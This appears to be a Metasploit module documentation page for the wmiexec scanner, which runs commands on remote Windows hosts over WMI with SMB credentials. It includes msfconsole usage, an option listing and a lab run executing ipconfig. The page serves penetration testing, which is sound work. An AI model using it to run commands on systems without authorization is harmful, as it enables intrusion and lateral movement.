WMI Exec - Metasploit
This page contains detailed information about how to use the auxiliary/scanner/smb/impacket/wmiexec metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: WMI Exec
Module: auxiliary/scanner/smb/impacket/wmiexec
Source code: modules/auxiliary/scanner/smb/impacket/wmiexec.py
Disclosure date: 2018-03-19
Last modification time: 2021-07-19 14:47:39 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module is also known as wmiexec.py.
A similar approach to psexec but executing commands through WMI.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
This module is a scanner module, and is capable of testing against multiple hosts.
msf > use auxiliary/scanner/smb/impacket/wmiexec
msf auxiliary(wmiexec) > show options
... show and set options ...
msf auxiliary(wmiexec) > set RHOSTS ip-range
msf auxiliary(wmiexec) > exploit
Other examples of setting the RHOSTS option:
Example 1:
msf auxiliary(wmiexec) > set RHOSTS 192.168.1.3-192.168.1.200
Example 2:
msf auxiliary(wmiexec) > set RHOSTS 192.168.1.1/24
Example 3:
msf auxiliary(wmiexec) > set RHOSTS file:/tmp/ip_list.txt
Required Options
RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
COMMAND: The command to execute
SMBPass: The password for the specified username
SMBUser: The username to authenticate as
Knowledge Base
Verification Steps
- Install Impacket v0.9.17 from GitHub. The
impacket
package must be in Python's module path, soimport impacket
works from any directory. - Install pycrypto v2.7 (the experimental release). Impacket requires this specific version.
- Start msfconsole
- Do:
use auxiliary/scanner/smb/impacket/wmiexec
- Set:
COMMAND
,RHOSTS
,SMBUser
,SMBPass
- Do:
run
, see the command result (ifOUTPUT
is enabled)
Options
OUTPUT
When the OUTPUT
option is enabled, the result of the command will be written
to a temporary file on the remote host and then retrieved. This allows the
module user to view the output but also causes it to be written to disk before
it is retrieved and deleted.
Scenarios
metasploit-framework (S:0 J:1) auxiliary(scanner/smb/impacket/wmiexec) > show options
Module options (auxiliary/scanner/smb/impacket/wmiexec):
Name Current Setting Required Description
---- --------------- -------- -----------
COMMAND ipconfig yes The command to execute
OUTPUT true yes Get the output of the executed command
RHOSTS 192.168.90.11 yes The target address range or CIDR identifier
SMBDomain . no The Windows domain to use for authentication
SMBPass wakawaka yes The password for the specified username
SMBUser spencer yes The username to authenticate as
THREADS 1 yes The number of concurrent threads
metasploit-framework (S:0 J:1) auxiliary(scanner/smb/impacket/wmiexec) > run
[*] [2018.04.04-17:10:47] Running for 192.168.90.11...
[*] [2018.04.04-17:10:47] 192.168.90.11 - SMBv3.0 dialect used
[*] [2018.04.04-17:10:47] 192.168.90.11 - Target system is 192.168.90.11 and isFDQN is False
[*] [2018.04.04-17:10:47] 192.168.90.11 - StringBinding: \\\\WINDOWS8VM[\\PIPE\\atsvc]
[*] [2018.04.04-17:10:47] 192.168.90.11 - StringBinding: Windows8VM[49154]
[*] [2018.04.04-17:10:47] 192.168.90.11 - StringBinding: 10.0.3.15[49154]
[*] [2018.04.04-17:10:47] 192.168.90.11 - StringBinding: 192.168.90.11[49154]
[*] [2018.04.04-17:10:47] 192.168.90.11 - StringBinding chosen: ncacn_ip_tcp:192.168.90.11[49154]
[*] [2018.04.04-17:10:49]
Windows IP Configuration
Ethernet adapter Ethernet 5:
Connection-specific DNS Suffix . : foo.lan
Link-local IPv6 Address . . . . . : fe80::9ceb:820e:7c6b:def9%17
IPv4 Address. . . . . . . . . . . : 10.0.3.15
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.0.3.2
Ethernet adapter Local Area Connection:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Ethernet adapter Ethernet 3:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Ethernet adapter Ethernet 4:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.90.11
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
Tunnel adapter isatap.foo.lan:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . : foo.lan
Tunnel adapter isatap.{70FE2ED7-E141-40A9-9CAF-E8556F6A4E80}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
[*] [2018.04.04-17:10:49] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Go back to menu.
Msfconsole Usage
Here is how the scanner/smb/impacket/wmiexec auxiliary module looks in the msfconsole:
msf6 > use auxiliary/scanner/smb/impacket/wmiexec
msf6 auxiliary(scanner/smb/impacket/wmiexec) > show info
Name: WMI Exec
Module: auxiliary/scanner/smb/impacket/wmiexec
License: CORE Security License (Apache 1.1)
Rank: Normal
Disclosed: 2018-03-19
Provided by:
beto
Spencer McIntyre
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
COMMAND yes The command to execute
OUTPUT true yes Get the output of the executed command
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
SMBDomain . no The Windows domain to use for authentication
SMBPass yes The password for the specified username
SMBUser yes The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)
Description:
A similar approach to psexec but executing commands through WMI.
References:
https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py
Also known as:
wmiexec.py
Module Options
This is a complete list of options available in the scanner/smb/impacket/wmiexec auxiliary module:
msf6 auxiliary(scanner/smb/impacket/wmiexec) > show options
Module options (auxiliary/scanner/smb/impacket/wmiexec):
Name Current Setting Required Description
---- --------------- -------- -----------
COMMAND yes The command to execute
OUTPUT true yes Get the output of the executed command
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
SMBDomain . no The Windows domain to use for authentication
SMBPass yes The password for the specified username
SMBUser yes The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)
Advanced Options
Here is a complete list of advanced options supported by the scanner/smb/impacket/wmiexec auxiliary module:
msf6 auxiliary(scanner/smb/impacket/wmiexec) > show advanced
Module advanced options (auxiliary/scanner/smb/impacket/wmiexec):
Name Current Setting Required Description
---- --------------- -------- -----------
ShowProgress true yes Display progress messages during a scan
ShowProgressPercent 10 yes The interval in percent that progress should be shown
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the scanner/smb/impacket/wmiexec module can do:
msf6 auxiliary(scanner/smb/impacket/wmiexec) > show actions
Auxiliary actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the scanner/smb/impacket/wmiexec auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(scanner/smb/impacket/wmiexec) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Module dependencies (impacket) missing, cannot continue
Here is a relevant code snippet related to the "Module dependencies (impacket) missing, cannot continue" error message:
125: self.get_output()
126:
127:
128: def run(args):
129: if dependencies_missing:
130: module.log('Module dependencies (impacket) missing, cannot continue', level='error')
131: return
132:
133: _msf_impacket.pre_run_hook(args)
134: executer = WMIEXEC(args['COMMAND'], args['SMBUser'], args['SMBPass'], args['SMBDomain'],
135: share='ADMIN$', noOutput=args['OUTPUT'] != 'true')
Go back to menu.
Related Pull Requests
- #15443 Merged Pull Request: Fix python3 compatibility with wmiexec module
- #15212 Merged Pull Request: Converts Python shebangs over to Python 3
- #13477 Merged Pull Request: Fix Python 3 syntax errors
- #12524 Merged Pull Request: Convert all python code to python3. Fixes #12506.
- #10570 Merged Pull Request: AKA Metadata Refactor
- #10106 Merged Pull Request: Add the scanner/smb/impacket/wmiexec module
References
See Also
Check also the following modules related to this module:
- exploit/windows/browser/wmi_admintools
- exploit/windows/local/ms16_014_wmi_recv_notif
- exploit/windows/local/ps_wmi_exec
- exploit/windows/local/wmi_persistence
- post/windows/gather/wmic_command
- auxiliary/scanner/smb/impacket/dcomexec
- auxiliary/scanner/smb/impacket/secretsdump
Authors
- beto
- Spencer McIntyre
Version
This page has been produced using Metasploit Framework version 6.1.27-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.